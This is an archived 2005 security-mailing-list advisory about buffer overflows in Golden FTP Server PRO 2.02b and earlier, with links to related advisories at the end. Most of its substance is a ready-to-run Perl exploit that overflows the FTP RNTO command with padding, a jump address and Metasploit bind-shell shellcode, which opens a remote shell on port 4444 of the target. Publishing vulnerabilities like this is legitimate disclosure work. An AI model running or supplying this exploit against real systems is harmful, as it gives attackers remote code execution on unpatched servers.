[NT] Multiple Buffer Overflows in Golden FTP Server

• Previous message: SecuriTeam: "[NT] W32Dasm Local Buffer Overflow"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: list@securiteam.com
Date: 25 Jan 2005 18:47:22 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -

  Multiple Buffer Overflows in Golden FTP Server
------------------------------------------------------------------------

SUMMARY

 <http://www.goldenftpserver.com/> Golden FTP Server is extremely easy to
use personal FTP server for Windows and can be run by any person who has
the most basic computer skills.

Golden FTP contains multiple vulnerabilities allowing a malicious attacker
to run arbitrary machine code on the target machine.

DETAILS

Vulnerable Systems:
 * Golden FTP Server PRO verion 2.02b and prior

Immune Systems:
 * Golden FTP Server PRO verion 2.05b or newer

Exploit Code:
This exploit code uses a buffer overflow in RNTO command to open a
bindshell on port 4444.

#!/usr/bin/perl -w
# Barabas - www.whitehat.co.il -
# cheers to muts and all peeps at WH.
# XPSP2 goldenftpserver sploit - bind 4444

use strict;
use Net::FTP;
my $payload="\x41"x260;
$payload .="\x65\x82\xa5\x7c";#jmpesp
$payload .="\x90"x32;#not really necessary...blah
# win32_bind - EXITFUNC=seh LPORT=4444 Size=321 Encoder=None
http://metasploit.com
$payload
="\xfc\x6a\xeb\x4f\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45".
"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\xe3".
"\x30\x49\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1".
"\xca\x0d\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe3\x8b\x5f\x24\x01".
"\xeb\x66\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24".
"\x1c\x61\xc3\x31\xc0\x64\x8b\x40\x30\x8b\x40\x0c\x8b\x70\x1c\xad".
"\x8b\x40\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x31\xdb\x66\x53".
"\x66\x68\x33\x32\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc".
"\x3b\x50\xff\xd6\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff".
"\xd0\x68\xd9\x09\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53".
"\x43\x53\xff\xd0\x66\x68\x11\x5c\x66\x53\x89\xe1\x95\x68\xa4\x1a".
"\x70\xc7\x57\xff\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9".
"\x57\xff\xd6\x53\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50".
"\x54\x54\x55\xff\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff".
"\xd0\x66\x6a\x64\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89".
"\xe7\x6a\x44\x89\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93".
"\x8d\x7a\x38\xab\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6".
"\x5b\x57\x52\x51\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad".
"\xd9\x05\xce\x53\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83".
"\xc4\x64\xff\xd6\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff".
"\xd0";

my $ftp = Net::FTP->new("127.0.0.1", Debug => 1);
$ftp->login("ftp","ftp");
$ftp->quot("RNTO",$payload);

ADDITIONAL INFORMATION

The information has been provided by <mailto:barbsie@gmail.com> barabas
mutsonline.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: SecuriTeam: "[NT] W32Dasm Local Buffer Overflow"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages

• [EXPL] Golden FTP Server Remote Buffer Overflow (USER, Exploit, 2nd Version)
  ... The following security advisory is sent to the securiteam mailing list, and can be
  found at the SecuriTeam web site: http://www.securiteam.com ... " Golden FTP Server is
  extremely easy to ... * Golden FTP Server Pro version 2.52 ... char shellcode[]
  = ... (Securiteam)
• [NT] Golden FTP Server Pro Directory Traversal and Path Disclosure
  ... The following security advisory is sent to the securiteam mailing list, and can be
  found at the SecuriTeam web site: http://www.securiteam.com ... " Golden FTP Server is
  extremely easy to ... Another vulnerability makes it possible to disclose ... The
  Golden FTP server sets a default FTP root directory, ... (Securiteam)
• [NT] Buffer Overflow In Golden FTP ( Long Username)
  ... The following security advisory is sent to the securiteam mailing list, and can be
  found at the SecuriTeam web site: http://www.securiteam.com ... Golden FTP server contains
  a buffer overflow with it's username field. ... (Securiteam)
• [EXPL] Golden FTP Server Pro Buffer Overflow (USER, Exploit)
  ... The following security advisory is sent to the securiteam mailing list, and can be
  found at the SecuriTeam web site: http://www.securiteam.com ... " Golden FTP Server is
  a free Windows FTP server ... unsigned char *recvbuf; ... (Securiteam)
• [EXPL] phpBB Remote PHP Code Execution (viewtopic.php 2)
  ... The following security advisory is sent to the securiteam mailing list, and can be
  found at the SecuriTeam web site: http://www.securiteam.com ... The following exploit code utilizes
  a vulnerability in phpBB to cause ... This bulletin is sent to members of the SecuriTeam
  mailing list. ... In no event shall we be liable for any damages whatsoever including direct,
  indirect, incidental, consequential, loss of business profits or special damages. ... (Securiteam)